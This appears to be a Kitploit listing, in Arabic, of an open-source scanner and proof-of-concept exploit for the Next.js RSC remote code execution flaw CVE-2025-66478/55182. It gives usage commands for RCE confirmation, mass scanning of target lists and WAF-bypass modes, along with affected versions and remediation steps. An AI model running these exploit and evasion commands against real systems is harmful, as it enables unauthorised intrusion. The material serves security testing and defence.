Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC2-CVE-2025-55182 — ماسح ضوئي متعدد الأنماط للثغرات في Next.js RCE (CVE-2025-66478/55182) مع كشف آمن للقنوات الجانبية، وإثبات المفهوم لـ RCE، وتقنيات تجاوز WAF، وفحص تبعيات المشروع المحلي. | Kitploit
أدوات/GitHubGitHub/iamblacksolo2-bugbounty/poc2-cve-2025-55182
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراق
GitHubiamblacksolo2-bugbounty/poc2-cve-2025-55182

POC2-CVE-2025-55182

ماسح ضوئي متعدد الأنماط للثغرات في Next.js RCE (CVE-2025-66478/55182) مع كشف آمن للقنوات الجانبية، وإثبات المفهوم لـ RCE، وتقنيات تجاوز WAF، وفحص تبعيات المشروع المحلي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

React2Shell Ultimate - ماسح CVE-2025-66478

CVE-2025-66478 CVE-2025-55182 CVSS 10.0 Python 3.7+ MIT License

الماسح الأكثر شمولاً لثغرة تنفيذ الأكواد عن بُعد في Next.js RSC

root@kitploit:~
╔════════════════════════════════════════════════════════════════════════╗
║     ____                 _   ___  ____  _          _ _                 ║
║    |  _ \ ___  __ _  ___| |_|__ \/ ___|| |__   ___| | |                ║
║    | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | |                ║
║    |  _ <  __/ (_| | (__| |_ / /_ ___) | | | |  __/ | |                ║
║    |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_|                ║
║                                                                        ║
║            React2Shell Ultimate CVE-2025-66478 Scanner v1.0.0         ║
║          Next.js RSC Remote Code Execution Vulnerability               ║
╠════════════════════════════════════════════════════════════════════════╣
║                                                                        ║
║                                                                        ║
╠════════════════════════════════════════════════════════════════════════╣
║  Modes: --safe (side-channel) | --rce (PoC) | --version | --local      ║
║  WAF Bypass: --waf-bypass | --vercel-bypass | --unicode                ║
╚════════════════════════════════════════════════════════════════════════╝

🚨 نظرة عامة على الثغرة

CVE-2025-66478 (المعروف أيضًا بـ CVE-2025-55182) هي ثغرة حرجة (CVSS 10.0) لتنفيذ الأكواد عن بُعد تؤثر على تطبيقات Next.js التي تستخدم مكونات الخادم React (RSC).

الإصدارات المتأثرة

✨ الميزات

تجمع هذه الأداة أفضل الميزات من عدة ماسحات لـ CVE-2025-66478:

🚀 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate

# Install dependencies
pip install -r requirements.txt

# Or install manually
pip install requests tqdm

📖 الاستخدام

المسح الأساسي

root@kitploit:~
# Version detection only (fastest, no exploitation)
python3 react2shell-ultimate.py -u https://target.com --version

# Safe side-channel detection (no code execution)
python3 react2shell-ultimate.py -u https://target.com --safe

# RCE proof-of-concept (executes harmless calculation: 41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce

# Comprehensive scan with all bypass attempts
python3 react2shell-ultimate.py -u https://target.com --comprehensive

المسح الجماعي

root@kitploit:~
# Scan multiple targets from file
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json

# Quiet mode - only show vulnerable hosts
python3 react2shell-ultimate.py -l targets.txt -q

# JSON output to stdout
python3 react2shell-ultimate.py -l targets.txt --json

مسح المشروع المحلي

root@kitploit:~
# Scan current directory
python3 react2shell-ultimate.py --local .

# Scan specific project path
python3 react2shell-ultimate.py --local /path/to/nextjs/projects

تقنيات تجاوز WAF

root@kitploit:~
# Junk data bypass (adds 128KB padding to evade content inspection)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass

# Custom junk data size
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256

# Unicode encoding bypass
python3 react2shell-ultimate.py -u https://target.com --rce --unicode

# Vercel-specific WAF bypass
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass

# Windows target (PowerShell payload)
python3 react2shell-ultimate.py -u https://target.com --rce --windows

الخيارات المتقدمة

root@kitploit:~
# With proxy
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080

# Custom headers
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"

# Increased timeout
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30

# Verbose output
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v

📋 خيارات سطر الأوامر

🔬 طرق الكشف

1. الكشف الآمن بالقناة الجانبية (--safe)

يُحفّز نمط استجابة خطأ محدد دون تنفيذ أي كود. يُحدد تطبيقات RSC القابلة للاختراق من خلال سلوك معالجة الأخطاء.

2. إثبات المفهوم RCE (--rce)

يُنفّذ عملية حسابية رياضية غير ضارة (echo $((41*271)) = 11111) لتأكيد قدرة تنفيذ الأكواد عن بُعد. تظهر النتيجة في الرأس X-Action-Redirect.

3. كشف الإصدار (--version)

  • يتحقق من الرأس X-Powered-By لإصدار Next.js
  • يحلل الرأس Vary لمؤشرات RSC
  • يختبر نقاط نهاية RSC للاستجابات text/x-component
  • يمسح مصدر الصفحة لبصمات Next.js

4. المسح المحلي (--local)

يمسح أدلة المشروع بحثًا عن:

  • package.json - إعلان الاعتمادية المباشرة
  • package-lock.json - ملف قفل NPM
  • yarn.lock - ملف قفل Yarn
  • pnpm-lock.yaml - ملف قفل PNPM
  • bun.lockb - ملف قفل Bun

📊 أمثلة على المخرجات

إخراج الكونسول

root@kitploit:~
[VULNERABLE] https://target.com
    Version: 15.3.1 | Status: 200 | Method: rce_poc
    WAF Bypass: SUCCESS

[NOT VULNERABLE] https://safe-target.com
    Version: 15.5.7 | Status: 200 | Method: http_headers

[WAF BLOCKED] https://protected.com
    Version: 15.2.0 | Status: 403 | Method: rce_poc
    WAF Detected: Exploit blocked

إخراج JSON

root@kitploit:~
{
  "tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
  "version": "1.0.0",
  "cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
  "scan_time": "2025-12-06T12:00:00Z",
  "total_results": 1,
  "results": [
    {
      "url": "https://target.com",
      "vulnerable": true,
      "version": "15.3.1",
      "status_code": 200,
      "detection_method": "rce_poc",
      "waf_detected": false,
      "waf_bypassed": false
    }
  ]
}

🛡️ المعالجة

إذا وجدت تطبيقات قابلة للاختراق:

  1. قم بالترقية فورًا إلى الإصدارات المصححة:

    • Next.js 15.x → الترقية إلى 15.5.7+ (أو تصحيح إصدارك الفرعي)
    • Next.js 16.x → الترقية إلى 16.0.7+
  2. التخفيفات المؤقتة:

    • استخدم Edge Runtime بدلاً من Node.js runtime
    • عطّل Server Actions إذا لم تكن بحاجة إليها
    • انشر خلف WAF مع كشف حمولة RSC
  3. راقب محاولات الاستغلال في السجلات

📚 المراجع

  • استشارة أمان Next.js - CVE-2025-66478
  • بحث Assetnote - React2Shell
  • NVD - CVE-2025-66478

⚠️ إخلاء مسؤولية

تم توفير هذه الأداة لاختبار الأمان المصرح به ولأغراض تعليمية فقط.

  • امسح فقط الأنظمة التي لديك إذن صريح لاختبارها
  • وضع إثبات المفهوم RCE يُنفذ كودًا على الأنظمة المستهدفة (حساب غير ضار)
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • المؤلف غير مسؤول عن سوء استخدام هذه الأداة

📄 الترخيص

رخصة MIT - انظر ملف LICENSE للتفاصيل.


⭐ قم بتقييم هذا المستودع بنجمة إذا وجدته مفيدًا! ⭐

تنزيل الأداة
نطاق الإصدارالحالة
Next.js 15.0.0 - 15.0.4⚠️ قابل للاختراق
Next.js 15.1.0 - 15.1.8⚠️ قابل للاختراق
Next.js 15.2.0 - 15.2.5⚠️ قابل للاختراق
Next.js 15.3.0 - 15.3.5⚠️ قابل للاختراق
Next.js 15.4.0 - 15.4.7⚠️ قابل للاختراق
Next.js 15.5.0 - 15.5.6⚠️ قابل للاختراق
Next.js 16.0.0 - 16.0.6⚠️ قابل للاختراق
Next.js 14.3.0-canary.77+⚠️ قابل للاختراق
Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+✅ مصحح
Next.js 16.0.7+✅ مصحح
Next.js 13.x, 14.x ثابت✅ غير متأثر
الميزةالوصف
🔍 كشف متعدد الأوضاعالقناة الجانبية الآمنة، إثبات المفهوم RCE، الإصدار فقط، المسح المحلي
🛡️ تقنيات تجاوز WAFحشو البيانات غير المرغوب فيها، ترميز Unicode، الالتفاف الخاص بـ Vercel
📁 مسح المشروع المحليمسح package.json وملفات القفل للاعتماديات القابلة للاختراق
⚡ أداء عالٍمسح متعدد الخيوط مع قابلية تكييف التوافق
📊 تنسيقات مخرجات متعددةكونسول، JSON، تصدير ملف
🎯 كشف دقيق للإصداررؤوس HTTP، بصمة RSC، الوعي بالإصدارات المصححة
الخيارالوصف
-u, --urlURL واحد للمسح
-l, --listملف يحتوي على روابط URL (واحد في كل سطر)
--localمسح دليل المشروع المحلي
--safeالكشف بالقناة الجانبية الآمن (بدون RCE)
--rceوضع إثبات المفهوم RCE
--versionكشف الإصدار فقط
--comprehensiveمسح كامل بجميع التقنيات
--waf-bypassإضافة بيانات غير مرغوب فيها لتجاوز WAF
--waf-bypass-sizeحجم البيانات غير المرغوب فيها بالكيلوبايت (الافتراضي: 128)
--unicodeترميز Unicode لتجاوز WAF
--vercel-bypassالالتفاف الخاص بـ Vercel لتجاوز WAF
--windowsاستخدام حمولة PowerShell لنظام Windows
-t, --threadsالخيوط المتزامنة (الافتراضي: 10)
--timeoutمهلة الطلب بالثواني (الافتراضي: 10)
-k, --insecureتعطيل التحقق من SSL
--proxyرابط الوكيل (http://host:port)
-H, --headerرأس مخصص (قابل للتكرار)
-o, --outputملف المخرجات (JSON)
--all-resultsحفظ جميع النتائج، وليس فقط القابلة للاختراق
-v, --verboseإخراج مفصل
-q, --quietعرض المضيفات القابلة للاختراق فقط
--jsonإخراج JSON إلى stdout
--no-colorتعطيل الإخراج الملون